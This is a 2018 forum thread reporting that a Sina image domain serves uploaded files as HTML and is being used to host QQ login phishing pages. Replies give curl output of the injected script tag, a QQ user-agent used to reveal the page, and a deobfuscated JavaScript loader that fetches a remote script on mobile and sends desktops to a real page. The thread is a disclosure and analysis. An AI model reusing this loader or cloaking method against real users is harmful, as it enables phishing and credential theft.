V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
工单节点使用指南
• 请用平和的语言准确描述你所遇到的问题
• 厂商的技术支持和你一样也是有喜怒哀乐的普通人类,尊重是相互的
• 如果是关于 V2EX 本身的问题反馈,请使用 反馈 节点
shansing
V2EX  ›  全球工单系统

新浪,你家“乐居云盘 API”域名快成钓鱼网页的温床了

  •  
  •   shansing · 2018-11-01 11:59:30 +08:00 · 4249 次点击
    这是一个创建于 2225 天前的主题,其中的信息可能已经有所发展或是发生改变。

    在 QQ 群里收到一张图片,内含一个二维码,解析成文本如下:

    http://photo.house.sina.com.cn/imp/imp/deal/df/10/f/19b39beda77577875e9300c2784_p36_mk35.gif&?_wv=9191&wwv=132

    在 QQ 里扫描二维码打开(或者在电脑上伪装 QQ UA,不伪装看不到钓鱼页面),是一个 QQ 空间登录页面。

    看起来像是有什么漏洞,竟然把 .gif 解析为网页了。网页加载了脚本 http://yyllssb.iicp.net/x.js

    我用的 iOS,在 QQ 中打开后右上角甚至没有“...”选项让我在系统浏览器中打开。加上 sina.com.cn 这个“安全”域名的加成,可以说是伪装性危害性很强了。

    赶快修一下吧。

    8 条回复    2018-11-13 09:29:02 +08:00
    cxh116
        1
    cxh116  
       2018-11-01 12:25:56 +08:00   ❤️ 2
    估计是代码逻辑的 bug ,只验证了后缀,没有验证 content-type ,然后上传时客户端把 content-type 设置成 text/html ,然后查看时,把保存 content-type 原路返回导致的.

    curl 结果

    ```
    curl -v 'http://photo.house.sina.com.cn/imp/imp/deal/df/10/f/19b39beda77577875e9300c2784_p36_mk35.gif&?_wv=9191&wwv=132'
    * Trying 123.59.190.209...
    * TCP_NODELAY set
    * Connected to photo.house.sina.com.cn (123.59.190.209) port 80 (#0)
    > GET /imp/imp/deal/df/10/f/19b39beda77577875e9300c2784_p36_mk35.gif&?_wv=9191&wwv=132 HTTP/1.1
    > Host: photo.house.sina.com.cn
    > User-Agent: curl/7.61.1
    > Accept: */*
    >
    < HTTP/1.1 200 OK
    < Server: nginx
    < Date: Thu, 01 Nov 2018 04:23:46 GMT
    < Content-Type: text/html; charset=us-ascii
    < Content-Length: 54
    < Connection: keep-alive
    < LEJU_FQDN: d12070561.grid.house.sina.com.cn
    < Accept-Ranges: bytes
    < X-Varnish: 47468363
    < Age: 0
    < Via: 1.1 varnish
    < x-hits: 0
    < X-Cache: MISS from d15070013.grid.house.sina.com.cn
    <
    <script src="http://yyllssb.iicp.net/x.js"></script>
    * Connection #0 to host photo.house.sina.com.cn left intact
    ```
    newmind
        2
    newmind  
       2018-11-01 14:01:36 +08:00
    尝试打开, 确实是腾讯家网站啊, 你是怎么操作的
    shequ
        3
    shequ  
       2018-11-01 14:02:39 +08:00
    微云都被关了,还说什么
    shansing
        4
    shansing  
    OP
       2018-11-01 15:14:48 +08:00
    @newmind 用 QQ 的 UserAgent 去打开,如:
    `Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117`
    nullzz
        5
    nullzz  
       2018-11-01 18:24:32 +08:00   ❤️ 1
    解个密

    ```

    function t(e) {
    var t = document.createElement("script");
    var n = document.getElementsByTagName("script")[0];
    t.src = e,
    t.async = !0,
    n.parentNode.insertBefore(t, n)
    }
    function n() {
    var e = {
    win: false,
    mac: false,
    xll: false
    };
    var t = navigator.platform;
    e.win = t.indexOf("Win") == 0;
    e.mac = t.indexOf("Mac") == 0;
    e.x11 = t == "X11" || t.indexOf("Linux") == 0;
    if (e.win || e.mac) {
    return false;
    } else {
    return true;
    }
    }
    n() ? t("//starrysd.cn./zepto.js") :window.location.href = "https://act.qzone.qq.com/vip/2018/vip-10th-m?_wv=16778243";

    ```
    shansing
        6
    shansing  
    OP
       2018-11-03 18:10:16 +08:00
    当时的二维码图片这今天的这个相似:
    aino
        8
    aino  
       2018-11-13 09:29:02 +08:00
    刚刚看见一个小老弟中毒了,然后转发给我了,我当然不会受骗,然后就来找这个神奇的东西了
    http://photo.house.sina.com.cn/imp/imp/deal/21/9b/5/762cd1be8f22f55ef963cb980dd_p36_mk35.gif
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1016 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 21:10 · PVG 05:10 · LAX 13:10 · JFK 16:10
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.